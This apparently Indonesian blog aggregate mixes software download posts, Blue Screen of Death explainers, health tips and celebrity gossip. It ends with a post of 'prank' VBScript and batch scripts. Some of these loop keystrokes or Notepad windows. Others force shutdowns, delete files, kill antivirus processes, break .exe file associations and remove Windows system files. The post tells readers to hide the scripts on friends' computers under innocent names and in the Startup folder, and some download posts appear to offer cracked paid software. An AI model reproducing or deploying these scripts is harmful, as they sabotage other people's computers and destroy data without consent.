> Warung Bebas

Download AdwCleaner 2.115 Full Version

AdwCleaner is a compact and portable tool which can help you to remove toolbars, adware and similar browser-based pests.
The program's interface is, well, a little basic. Click "Search" and in a moment or two an in-depth report appears in Notepad, describing any issues you might have. Click "Delete" and AdwCleaner will try to delete everything, displaying another Notepad report on the details. And that's about it.
While this is undoubtedly very simple, our immediate concern is that there's no general way to tell AdwCleaner what you want to keep, and what should go. The only control comes in the Options dialog, where you can instruct AdwCleaner to ignore the Ask toolbar, or not to examine one or more browsers (the program supports IE, Firefox, Chrome and Opera).
Does it work, though? To find out, we installed a few free programs, allowing them to install whatever they liked. And when we ran AdwCleaner, it correctly detected and displayed everything we'd just acquired: the RelevantKnowledge service, Babylon Toolbar, Complitly, Smart Suggestor and more.
We clicked "Delete", and after confirming that yes, we really were sure, AdwCleaner went to work, closing all our programs, removing the various files and Registry keys, and rebooting our PC. You don't get much choice in any of this - there's no "reboot later" option - and, again, we didn't really feel in control. But when our system restarted, the unwanted extras had all disappeared, and that's clearly good news.
AdwCleaner is short on options, then. It's difficult to see or control exactly what it's going to do. And there's no real documentation, which all goes to make us feel just a little on the nervous side.
But, at the same time, the program does appear to do a reasonable job of detecting and removing common browser annoyances. And so, while it wouldn't be our first choice of toolbar remover, it might be worth keeping a copy of AdwCleaner in reserve, just in case you encounter something that your regular tools can't handle.
Verdict:
It's worrying that AdwCleaner provides so little control over what it does. The program seems to work well, though, and if your regular antispyware tool can't remove something then we'd give it a try
Minimal System :
  • Windows XP, Windows Vista(32bit&64bit), Windows7 (32bit & 64bit), Windows 8
  • Processor : 1.2gHz
  • Languages : English







Download Kaspersky Internet Security 2014 (v14.0.0.1163)


Kaspersky Internet Security 2014 Technical Preview is an early beta version of Kaspersky's security suite.
There's no complete list of new features yet, but once obvious change is the optimised, simplified and even more Windows 8-like interface (there's touch screen support, too). At first glance this looks a little plain to us, but Kaspersky says it's not completed yet, so we'll reserve judgement for now.
Kaspersky's Safe Money (a feature which helps to secure your online transactions) now supports more banks and web stores, and allows you to choose your preferred browser.
The company claims the new release will use less resources. And apparently it will also provide "connected standby technology support", although what level of support, and where, isn't yet clear.
This isn't the most exciting of betas, then, but if you're interested in try it out, the process is easy enough. You don't have to register anywhere, or sign up to the testing program: just download the installer to your target system (which should be fully backed up - this is a beta, and sure to contain many bugs), run it, and complete the setup process as normal.
Keep in mind, though, that this should be a clean install. Don't try to install the beta over an older version, and don't even try to transfer previous settings. And once it's running, don't rely on the suite protecting you for very long - it's just not reliable enough yet.

Minimal System :
  • Windows XP, Windows Vista(32bit&64bit), Windows7 (32bit & 64bit), Windows 8
  • Processor : 1.2gHz
  • Languages : English








Download Norton Internet Security 2013 v.20.3 Full Version

Norton Internet Security 2013 20.3 Full License code -  new versions of products have an interesting opportunity: a mobile interface, and system Norton Management, which allows to access the product via a browser, which allows a remote scan of your computer without direct user intervention. In addition, Internet Security was able to control the bandwidth of the Internet channel, so the user can give priority to a particular application. Also got new software Download Insight, designed to test for malicious hyperlinks visited, as well as downloadable programs for infection in some hacker's code.

Key Features :
Engineered for Speed:

  • Proven fastest and lightest security suite available
  • Intelligence-driven Norton Insight technology targets only those files at risk for faster, fewer, shorter scans
  • Installs in under one minute on average requires less than 7 MB of memory and more
Norton Identity Safe:
  • Keeps your online identity safer than ever when you buy, bank, browse, and game online.
  • Advanced phishing protection keeps your personal identification out of the hands of fraudulent Web sites.
  • Stores and encrypts your passwords and other confidential data.
  • Fills in online forms at your request to save time and protect you from keystroke loggers.

Requirements:
  • 300 MHz or faster processor
  • 256 MB of RAM (512 MB RAM required for the Recovery Tool)
  • 300 MB of available hard disk space
  • Standard Web browser
  • Email scanning supported for POP3- and SMTP-compatible email clients.Required for all installations:
  • Support for AntiSpam feature
  • Microsoft Outlook 2002 or later
  • Microsoft Outlook Express 6.0 or later
  • Browser support for Browser Defense and Phishing Protection features
  • Microsoft Internet Explorer 6.0 (32-bit only) and later
  • Mozilla Firefox 3.0 and later

Screnshoot : 

Free License Norton Internet Security 2013



Note : Setelah anda Mencoba Versi ini, Silahkan membeli Software aslinya!!



Ini Dia !! Program Pendeteksi Bluescreen Pada Komputer


Pada postingan sebelum na kita telah membahas tentang Pengertian Dan Penyebab Bluescreen of  Death disana kita telah bahas tentang bluescreen ,penjelasan nya serta penyebab terjadi nya,,lalu jika kita tau tentang hal tersebut ,,apakah anda tidak ingin memeriksa apakah komputer atau laptop anda memiliki gejala yang akan memicu terjadinya bluscreen??
jika anda ingin memeriksa komputer atau laptop anda terjadi gejala bluescreen ,saya punya program untuk memdeteksi apakah program atau windows di komputer atau di laptop anda mengalami gejala bluescreen nih saya rekomendasikan sebuah program yang bernama WhoCrashed :
WhoCrashed adalah sebuah aplikasi yang di gunakan untuk mendeteksi dimana komputer kita telah terjadi bluescreen ,program ini akan mendeteksi mengapa dan apa yang menyebabkan komputer atau laptop kita mengalami bluescreen dan disini anda bisa mengetahui dan memperbaiki gejala tersebut.

Silahkan Download Softwarenya :
@2mb

Direct Download

sumber:http://rufous.web.id/program-pendeteksi-bluescreen-of-death/

Ini Dia Pengertian Dan Penyebab Blue Screen of Death


pada postingan ini kita membahas tentang Blue Screen
BSOD atau Blue Screen of Death adalah suatu kondisi ketika komputer di lingkungan Microsoft Windows mengalami kegagalan atau crash. Proses ini terjadi di lingkunganWindows sejak versi awal, yakni Windows 3.0 dan 3.1, dan dapat terus terjadi hingga versi-versi berikutnya, seperti pada Microsoft Windows 95, Windows 98, Windows NT, dan Windows 2000. Disebut Blue Screen of Death karena pada saat terjadi crash, layar monitor akan berubah menjadi biru, komputer akan hang dan membeku, dan dibutuhkan proses rebooting.

Penyebab-penyebab Blue Screen of Death :
1. IRQL_NOT_LESS_OR_EQUAL (0X0000000A)
Error ini yang paling sering muncul pada saat terjadi Blue Screen.
Pesan kesalahan ini biasanya disebabkan kerena ada ketidakcocokan driver yang terinstall di komputer.
Penyebabnya:
- Driver yang bentrok atau tidak cocok
- Permasalahan pada Video Card, hal ini mencakup video card yang di overclock melebihi batas atau Anda baru berganti Video card dan Anda belum menguninstall driver Video card lama dari chipset berbeda
- Permasalahan pada Audio Card, meliputi kesalahan konfigurasi atau bug dalam driver sound card

2. NTFS_FILE_SYSTEM atau FAT_FILE_SYSTEM (0X00000024) atau (0X00000023)
Pesan error ini setidaknya sudah sedikit memberikan gambaran di mana kerusakan berada, yaitu ada di partisi atau filesystemnya tetapi bukan di harddisknya.
Kita bisa melakukan pengecekan dengan memeriksa kabel SATA atau PATA atau bisa mengecek partisi dengan tool chkdsk.

3. UNEXPECTED_KERNEL_MODE_TRAP (0X0000007F)
Bila Anda mendapatkan pesan error seperti ini, dapat disebabkan karena:
- Overclock Hardware yang berlebihan
- Komponen komputer yang terlalu panas
- BIOS yang korup
- Memory dan CPU yang cacat

4. DATA_BUS_ERROR
Pesan error ini disebabkan karena adanya kemungkinan bahwa memory atau slot memory di motherboard rusak.

5. PAGE_FAULT_IN_NONPAGED_AREA

Pesan error ini disebabkan karena adanya kerusakan hardware, termasuk memory utama, memory video card, atau memory di processor (L2 Cache)

6. INACCESSIBLE_BOOT_DEVICE
Pesan error ini disebabkan karena adanya kesalahan dalam konfigurasi jumper harddisk yang salah, virus boot sector, driver IDE controller yang salah, atau kesalahan driver chipset.

7. VIDEO_DRIVER_INIT_FAILURE
Pesan error ini disebabkan karena adanya Kesalahan terjadi pada instalasi driver video card yang kurang sempurna, restart pada saat instalasi atau juga dapat terjadi karena kesalahan dalam instalasi driver.

8. BAD_POOL_CALLER
Pesan error ini disebabkan karena adanya Kesalahan ini dapat terjadi karena kesalahan atau driver yang tidak kompatibel. Sering terjadi saat melakukan instalasi XP dari upgrade, atau bukan dari instalasi baru.

9. PEN_LIST_CORRUPT
Pesan error ini disebabkan karena adanya kerusakan RAM

10. MACHINE_CHECK_EXCEPTION
Pesan error ini disebabkan oleh cacatnya CPU, atau yang di overclock secara agresif, serta power supply yang kekurangan daya atau rusak.

sumber: http://rufous.web.id/pengertian-dan-penyebab-blue-screen-of-death/


Cara Membuat Iklan Melayang Disamping Blog

Hay Sob, Kali Ini saya akan Posting Tentang "Cara Membuat Iklan Melayang Disamping Blog"
Walaupun ini sudah lama diketahui para blogger master, saya hanya ingin membagikannya ke teman2 :) Langsung aja simak tutorialnya dibawah ini :

1. Buka akun blogger sobat dan menuju ke dashboard
2. Kemudian pilih menu tata letak dan kemudian add gadget

tempat gadgetnya bebas sih,, suka-suka kalian aja soalnya gak bakal pengaruh, hehe :D

3. pilih HTML/JavaScript

4. Copy - Paste kode berikut pada kotak yang tersedia


4. Copy - Paste kode berikut pada kotak yang tersedia




nb:
masukkan script iklan sobat untuk menggantikan tulisan "LETAKKAN SCRIPT IKLAN DISINI"

5. klik Save


Sumber : http://idebangga.blogspot.com/2013/01/cara-membuat-iklan-melayang-di-samping.html


Cara Menebak Kepribadian Pria Sesuai Binatang Peliharaannya


Wanita terkadang mengalami kesulitan dalam membaca kepribadian seorang pria. Namun sebenarnya kepribadian pria bisa ditebak melalui binatang peliharaannya. Bagaimana tepatnya? Simak selengkapnya seperti yang dilansir dari She Knows berikut ini.
Anjing
Pemilik anjing adalah tipe orang yang cukup loyal. Sebab mengurus binatang peliharaan yang satu ini memang butuh perawatan ekstra dan harus dilakukan dengan penuh kesabaran. Pria yang memelihara anjing juga umumnya siap berkomitmen. Namun tidak semuanya punya pola pikir demikian untuk urusan cinta.

Kucing
Sensitif sekaligus percaya diri, itulah kepribadian utama dari pria yang memelihara kucing. Selain itu, menjalin hubungan dengan pria pecinta kucing juga membuat Anda harus belajar berbagi perhatian. Sebab binatang peliharaan yang satu ini benar-benar manja dan tidak suka diduakan.

Ikan
Pria yang memelihara ikan seolah selalu melihat dunia melalui akuarium. Mereka menganggap dunia hanya seperti perairan raksasa dan lawan jenis adalah tiram yang menghiasinya. Karena itu, hubungan asmara yang dijalani juga akan dianggap sebagai sesuatu yang semu semata.

Reptil
Peliharaan yang tidak biasa seperti reptil bisa jadi pertanda bahwa pria suka pamer di depan teman-temannya. Selain itu, mereka juga termasuk pribadi yang masih terikat dengan masa lalu. Terutama jika reptil peliharaannya terkurung di balik kandang.

Itulah kepribadian pria berdasarkan binatang yang dipelihara. Cocok atau tidak dengan Anda?

7 Cara Mencegah Penyakit Jantung


Ada banyak cara untuk melindungi jantung. Seperti makan makanan bergizi dan rajin berolahraga. Namun cara untuk mencegah penyakit jantung yang satu ini berbeda dan cukup mengejutkan. Simak selengkapnya sebagaimana yang dilansir dari Third Age berikut ini.
Menjaga kesehatan gigi
Sepertinya gigi tidak ada hubungannya dengan jantung. Tetapi tunggu dulu, ternyata infeksi yang menyerang gusi bisa memicu inflamasi dalam pembuluh darah - kondisi yang sudah dibuktikan melalui penelitian yang mampu memicu penyakit kardiovaskular. Jadi jaga kesehatan gigi Anda untuk mencegah penyakit jantung.

Pergi berlibur
Tidak perlu pergi ke luar negeri atau menghabiskan banyak uang jika ingin liburan. Anda cukup jalan-jalan ke pantai atau berkemah di gunung demi mencegah penyakit jantung. Pergi liburan minimal dua kali setahun bukan cuma menyenangkan, tetapi juga baik bagi jantung.

Tidur cukup
Menjaga kesehatan jantung juga sebenarnya cukup dilakukan dengan memenuhi kebutuhan tidur. Jadi penuhi kebutuhan tidur setidaknya delapan jam setiap malam. Pasalnya penelitian sudah membuktikan bahwa orang-orang yang tidur kurang dari enam jam punya risiko dua kali lipat terkena penyakit jantung.

Vaksin flu
Orang dewasa yang divaksin juga memiliki risiko serangan jantung 20 persen lebih rendah. Apa hubungannya? Rupanya infeksi saluran pernapasan mampu meningkatkan risiko penyakit jantung dan stroke. Maka dari itu jangan malas melakukan vaksin untuk melindungi kesehatan pernapasan dan jantung.

Makan cokelat
Pecinta cokelat terbukti 37 persen lebih rendah terkena penyakit jantung. Hal itu dibuktikan dalam sebuah penelitian dari Inggris. Bukan cuma penyakit jantung, diabetes juga bisa dicegah dengan makan cokelat. Syaratnya cuma satu, cokelat harus yang mengandung 70 persen cacao.

Berjemur di pagi hari
Matahari pagi adalah sumber vitamin D yang murah dan mudah didapat. Selain memenuhi kebutuhan vitamin D, berjemur di pagi hari juga menurunkan risiko penyakit jantung. Sebab berbagai penelitian sudah membuktikan kalau kekurangan vitamin D membuat seseorang berisiko terkena penyakit jantung.

Tertawa
Cara mengejutkan yang terakhir untuk mencegah penyakit jantung adalah dengan tertawa. Misalnya melalui kebiasaan menonton film lucu atau terhibur oleh humor teman. Dengan tertawa, stres menurun dan membuat aliran darah dalam pembuluh menjadi lebih tenang. Risiko penyakit jantung pun berkurang jika seseorang sering tertawa.

Itulah berbagai cara mengejutkan sekaligus menyenangkan untuk mencegah penyakit jantung. Selamat mencoba!

Cara Menurunkan Resiko Stroke Dengan Mudah


Kopi atau teh hijau? Jangan bingung, karena kedua minuman ini bisa memberikan manfaat yang sama untuk menurunkan risiko stroke, berdasarkan penelitian terbaru.
Hasil tersebut didapatkan peneliti setelah mengamati 83.269 orang dewasa di Jepang berusia 45 sampai 74 tahun. Mereka diminta untuk menuliskan kebiasaan meminum teh hijau dan kopi. Kemudian peneliti mengamati kemungkinan terkena penyakit jantung, stroke, dan kematian selama 13 tahun.
Mereka menemukan bahwa orang yang mengonsumsi setidaknya satu cangkir kopi sehari memiliki risiko stroke 20 persen lebih rendah dibandingkan orang yang jarang mengonsumsi kopi, seperti dilansir oleh CBS News (16/03).
Sementara itu, orang yang minum dua sampai tiga cangkir teh hijau setiap hari memiliki risiko stroke 14 persen lebih rendah. Orang yang minum hingga empat cangkir atau lebih teh hijau memiliki kemungkinan stroke 20 persen lebih rendah. Peneliti juga menemukan bahwa orang yang minum teh hijau lebih suka berolahraga dibanding peminum kopi.
Penelitian sebelumnya mengungkap bahwa orang yang minum dua cangkir kopi setiap hari berisiko terkena penyakit jantung koroner. Namun peneliti percaya ha tersebut dipengaruhi oleh kebiasaan lain seperti merokok. Sementara pada penelitian ini peneliti telah menghitung faktor risiko lain seperti merokok, minum alkohol, berat badan, olahraga, dan diet.
Peneliti belum yakin apa penyebab teh hijau dan kopi bisa menurunkan risiko stroke. Namun mereka percaya zat yang terkandung di dalam minuman tersebut penyebabnya. Dalam teh hijau terdapat zat yang dinamakan catechins. Zat antioksidan ini memiliki khasiat mengurangi peradangan. Sementara pada kopi terdapat zat bernama chlorogenic acid yang menurunkan risiko terkena diabetes tipe-2 dan stroke.
http://www.merdeka.com/sehat/turunkan-risiko-stroke-dengan-minum-teh-hijau-dan-kopi.html

Wah !! Stroke bisa dideteksi dari cara menulis SMS


Cara menulis dan mengirim SMS ternyata bisa digunakan sebagai alat penting mendeteksi risiko stroke fatal. Peneliti menemukan bahwa penulisan pesan singkat yang kacau bisa menunjukkan risiko stroke, bahkan jika orang tersebut bisa berbicara dan menulis dengan normal.
Peneliti dari Henry Ford Hospital, Detroit menemukan ini setelah mengamati kasus pria berusia 40 tahun yang dicurigai memiliki stroke. Pria ini bisa berbicara dan menulis dengan normal, namun tak bisa mengetahui bahwa pesan yang dikirimkan kacau.
Pria ini tak memiliki masalah bahkan ketika melewati tes bahasa seperti berbicara, membaca, dan menulis. Meski begitu, ketika dia mengirim pesan, dia mengirim kalimat yang kacau dan tak bisa menyadarinya.
Meski hanya menunjukkan sedikit ketidaksimetrisan pada bagian wajah tanpa pertanda lainnya, dokter berhasil menemukan bahwa pria ini mengalami stroke akut setelah menemukan sumbatan aliran darah pada otak.
Pria ini mengirim pesan pada istrinya sebelum berangkat ke rumah sakit. Teks yang dikirimkannya sangat acak, bahkan tak bisa disebut sebagai kalimat, seperti dilansir oleh Daily Mail (14/03).
Hal ini menunjukkan pada peneliti bahwa mengirim pesan bisa menunjukkan bahwa menulis SMS bisa dijadikan cara untuk mendeteksi adanya risiko stroke fatal.
Sumber ; http://www.merdeka.com/sehat/stroke-bisa-dideteksi-dari-cara-menulis-sms.html 

Cara Lindungi Mata Dari Radiasi Komputer


Mata lelah seringkali dialami banyak orang ketika mereka sering menggunakan komputer setiap harinya. Menatap komputer terus-menerus bisa membuat mata kering, terutama dalam ruangan yang memiliki AC.
Peneliti telah menemukan cara mudah untuk mengatasi mata lelah akibat terlalu lama memandang komputer, yang mereka sebut strategi '20-20-20-20', seperti dilansir olehDaily Mail (13/03).
Caranya adalah dengan berkedip 20 kali selama 20 menit sekali. Kemudian menjauhkan pandangan dari komputer selama 20 detik dan memfokuskan pandangan pada sebuah obyek yang berjarak 20 kaki atau sekitar enam meter.
Strategi ini dikembangkan sebagai solusi computer vision syndrome yang banyak dialami oleh karyawan dan orang yang gemar bermain game. Computer Vision Syndrome (CVS) ditandai dengan mata kering dan lelah, sakit kepala, leher dan otot yang kaku. Biasanya ini merupakan masalah temporer, namun bisa sangat mengganggu ketika terjadi setiap hari.
Mereka yang memiliki risiko paling tinggi adalah orang yang menghabiskan lebih dari tiga jam di depan komputer. CVS bisa jadi sangat mengganggu dan menyakitkan, serta membuat mata rabun.
Orang yang menghabiskan banyak waktu di depan komputer memang berisiko. Namun risiko lebih tinggi pada karyawan, karena saat ini kebanyakan kantor memiliki pendingin ruangan yang membuat ruangan kering dan dingin. PEndingin ruangan memang nyaman bagi tubuh, namun memiliki efek negatif pada mata.
Semua orang yang menghabiskan banyak waktu di depan komputer, terutama karyawan sebaiknya menggunakan strategi 20-20-20-20 tersebut setiap hari. Menggunakan tetes mata sebelum bekerja juga disarankan, namun lebih baik jika sering-sering mengalihkan pandangan dari komputer.
Sumber : http://www.merdeka.com/sehat/ingin-lindungi-mata-dari-radiasi-komputer-lakukan-cara-ini.html

Wah !! Vokalis Simple Plan Pilih Jengkol Dari pada Sate


KAPANLAGI.COM - Band asal Perancis - Kanada, Simple Plan didapuk menjadi bintang tamu di acara Mels Update ANTV. Dalam acara ini band berpersonil Pierre Bouvier (vokalis), Jeff Stinco (gitar), S├ębastien Lefebvre (gitar dan vokal latar), David Desrosiers (bass dan vokal latar), dan Chuck Comeau (drum) disuruh untuk mencicipi beberapa makanan khas Indonesia.
"Kalian boleh mencicipi makanan sesuai dengan yang terlihat lezat menurut kalian," ucap Melanie saat tapping di Assembly Hall 3, Jakarta Convention Center, Senayan, Jakarta Pusat, Minggu (17/3).
Dan kejadian lucu terjadi kala masing masing personil mencicipi makanan yang mereka pilih, dari sate hingga pete. Namun vokalis Simple Plan, Pierre Bouvier lah yang bertingkah paling lucu. Dirinya yang sama sekali tak menduga akan menikmati semur jengkol yang bagi sebagian masyarakat kurang disuka karena identik dengan bau menyengat, ternyata malah bilang sangat lezat.
"Jengkol is very nice," komentar Bouvier. Alhasil, para penonton yang sebagian besar adalah penggemar Simple Plan langsung tertawa terbahak-bahak.
Melaney pun langsung berkomentar dengan pernyataan Bouvier, "Jengkol kalau dimakan sedikit saja enggak masalah. Tapi kalau kebanyakan nanti kamu kena jengkolat," tandas Melanie

Penyebab Nicki Minaj Terlambat Datang Ke "American Idol"


Penyanyi Rap Nicky Minaj terlambat dalam acara langsung 'American Idol' pada Rabu karena dia terjebak macet yang sangat parah.
Pelantun 'Starships' itu menjadi juri, bersama dengan Keith Urban, Randy Jackson, dan Mariah Carey dalam acara TV kontes bernyanyi Amerika Serikat tersebut, namun dia melewatkan awal program karena padatnya jalan-jalan di Los Angeles.
Dalam serangkaian posting di halaman Twitter.com-nya, dia menulis: "Terjebak macet *menghela napas*. Malibu sial!!!!!!!!!! *pindah ke Beverly Hills*.
Mengacu pada ketidakhadiran Nicki, pembawa acara Ryan Seacrest mengatakan kepada penonton, "Kami akan hadir secara langsung dan tepat waktu di hadapan Anda. Bagi tiga dari empat juri yang hadir di sini pada malam ini, simpan tenaga kalian... Aku dengar dia (Nicki) terlambat tujuh menit dan ada kemacetan di 405 (jalan tol). Dia akan berada di sini sesaat lagi."
Penyanyi rap itu tiba hampir 15 menit setelah acara dimulai, hanya melewatkan penampilan dari satu peserta pada malam itu.

Sumber : Yahoo.com

Tetap Bisa Sehat, Walaupun Tanpa Organ Penting Ini


Tubuh kita merupakan mesin ajaib yang terdiri dari organ vital, saraf, pembuluh darah dan sebagainya. Semuanya bekerja sama untuk membuat kita tetap dalam kesehatan yang optimal.

Namun terkadang, seperti mesin, beberapa bagian tubuh kita mengalami kerusakan. Jika organ yang rusak, pengangkatan menjadi pilihan terbaik.


Tapi tenang. Kita masih tetap sehat dan hidup normal meskipun beberapa organ diangkat, seperti dilansir dari Foxnews.


Ginjal. Tuhan memberikan kita sepasang ginjal untuk menyaring racun dari darah, membantu mempertahankan tekanan darah dan menjaga tingkat nutrisi dalam tubuh.

Sayangnya, sebagian orang terlahir hanya dengan satu ginjal atau terpaksa mengalami pengangkatan ginjal karena infeksi atau mendonorkan satu ginjalnya. Dengan satu ginjal, Anda masih bisa tetap hidup sehat dan normal asalkan menjaga pola makan sehat, menghindari alkohol dan obat-obatan yang dapat melukai ginjal.


Limpa. Tugas limpa adalah menyaring darah dan membantu tubuh memerangi infeksi. Tapi tanpa limpa di tubuh (karena rusak), Anda masih bisa bertahan hidup karena hati akan mengambil alih fungsinya. Yang perlu diperhatikan adalah Anda harus menjaga daya tahan tubuh karena orang tanpa limpa sangat rentan terhadap infeksi.

Organ reproduksi. Rahim wanita bisa diangkat karena masalah kanker, fibroid rahim, nyeri panggul kronis atau alasan lainnya. Sedangkan pria juga berisiko tidak memiliki testis karena harus diangkat akibat kanker testis. 

Tanpa organ reproduksi, Anda masih bisa hidup sehat seperti orang dengan organ reproduksi. Namun, Anda tidak bisa memiliki keturunan. Dan bagi wanita usia produktif, dirinya tidak akan mengalami menstruasi. 


Perut. Biasanya, perut akan diangkat ketika Anda memiliki kanker perut. Kerongkongan akan langsung terhubung dengan usus kecil Anda dan ahli bedah akan memperluas daerah usus kecil sebagai perut pengganti. Makanan akan diproses sama seperti sebelumnya, tetapi Anda tidak dapat menyerap vitamin B12 terlalu banyak.

Usus besar. Penderita Crohn dan kanker usus besar harus rela ususnya diangkat demi mencegah hal yang lebih parah. Ahli bedah akan membuat 'kantung' baru dalam tubuh yang bertindak sebagai pengganti usus. Namun, jika Anda tak menginginkan 'kantung' tersebut, hidup tanpa usus pun tak masalah.
Sumber : yahoo.com


Cara Mengetahui Android Bootloader Locked atau Unlocked

Apa itu Bootloader?
Bootloader berguna untuk melakukan proses boot sistem operasi (Android) dalam handheld kita. Biasanya, bootloader hp kita di lock (kunci) oleh Sony Ericsson selama proses produksi. Hampir semua custom ROM yang kita instal memiliki KERNEL sendiri yang bertanggung jawab untuk overclock, dan lain-lain. Nah, untuk instal custom rom yang memiliki custom KERNEL, maka kita harus Unlock Bootloader.

Langkahnya :

Dial *#*#7378423#*#*

Pilih Service info


Pilih Configuration



Bootloader unlock allowed: Yes
berarti HH kamu bootloadernya LOCKED

Bootloader unlocked: Yes
berarti HH kamu bootloadernya UNLOCKED

Sumber : http://www.hsp21.com/2012/09/cara-mengetahui-bootloader-locked-atau.html




Kumpulan Script Jahil Part 2 - Habis

Script merupakan sebuah kode yang digunakan oleh seorang programer untuk membuat sebuah program atau system yang ada dalam komputer/laptop yang biasa kita gunakan. Tapi kalau kita salah dalam menyusun script tersebut maka script tersebut dapat memusingkan kita. Oke, Ini Dia Lanjutan Kumpulan Script Jahil Part 1






6. MENEKAN TOMBOL BACKSPACE SECARA TERUS MENERUS
MsgBox “Lets Rumble”
 Set wshShell =wscript.CreateObject("WScript.Shell")
do
 wscript.sleep 100
 wshshell.sendkeys "{bs}"
loop


[Save dengan ekstensi *.vbs]

7. OTOMATIS MENGETIK "Dasar jelek!!!" DI NOTEPAD
Set wshShell =wscript.CreateObject("WScript.Shell")
do
 wscript.sleep 100
 wshshell.sendkeys "dasar jelek!!!"
loop

[Save dengan ekstensi *.vbs]


8. MEMBUKA NOTEPAD TERUS MENERUS
@ECHO off
:top
 START %SystemRoot% \system32\notepad.exe
GOTO top

[Save dengan ekstensi *.bat]


9. MEMBUKA NOTEPAD DAN OTOMATIS NGETIKWScript.Sleep 180000
 WScript.Sleep 10000
 Set WshShell = WScript.CreateObject("WScript.Shell")
 WshShell.Run "notepad"
 WScript.Sleep 100
 WshShell.AppActivate "Notepad"
 WScript.Sleep 500
 WshShell.SendKeys "kom"
 WScript.Sleep 500
 WshShell.SendKeys "pu"
 WScript.Sleep 500
 WshShell.SendKeys "ter"
 WScript.Sleep 500
 WshShell.SendKeys "mu "
 WScript.Sleep 500
 WshShell.SendKeys "a"
 WScript.Sleep 500
 WshShell.SendKeys "kan "
 WScript.Sleep 500
 WshShell.SendKeys "han "
 WScript.Sleep 500
 WshShell.SendKeys "cur!!"
 WScript.Sleep 500
WshShell.SendKeys "hohoho "



[Save dengan ekstensi *.vbs]


10. SCRIPT QUIZ
@echo off
title quiz hari ini 
 :menu
cls
 echo jika komputermu terkena virus apa yang kamu lakukan
pause
 echo pilih yang mana:
 echo 1. banting komputer
 echo 2. buang komputer
 echo 3. bingung
 set input=nothing
 set /p input=Choice:
 if %input%==1 shutdown -s -t 30
 if %input%==2 del c:\xxx
 if %input%==3 @ECHO off
 msg * dasar jelek
 msg * ngaca sono
 msg * hayo, CPU lo ane acak2 nih
 msg * mau berhenti?
 msg * install ulang saja
 msg * biar cepet kelar :D
 @ECHO off
:top
 START %SystemRoot%
 \system32\notepad.exe
GOTO top

[Save dengan ekstensi *.bat]


11. BAHAYA!! JANGAN DICOBA DI KOMPUTER PRIBADI@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked ….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /F /Q DEL C:\WINDOWS
\system32\logon.exe /F /Q DEL C:\WINDOWS
\system32\logon.scr /F /Q cls
shutdown -s -t 5 -c
"thank you for waiting"



[Save dengan ekstensi *.bat]


Semua Script di atas dapat disimpan dengan nama terserah anda, ganti tanda * dengan nama yang anda inginkan, tapi ekstensi harus sesuai dengan format di atas. Misalkan disimpan dengan nama bukanih.bat atau bacanih.vbs. Simpan di komputer teman kalian dengan nama yang tidak mencurigakan. Kalau mau berjalan otomatis, silahkan simpan di folder StartUp yang ada di menu Start. Oiya, setelah kalian simpan Script-script usil tersebut jangan nongol di depan teman kalian itu, agar tidak dilempar pake CPU, hehe.

NB: "Jangan digunakan sembarangan, resiko dan dosa silahkan tanggung sendiri"

Sumber : http://handlerpedia.blogspot.com/2013/02/kumpulan-script-jahil.html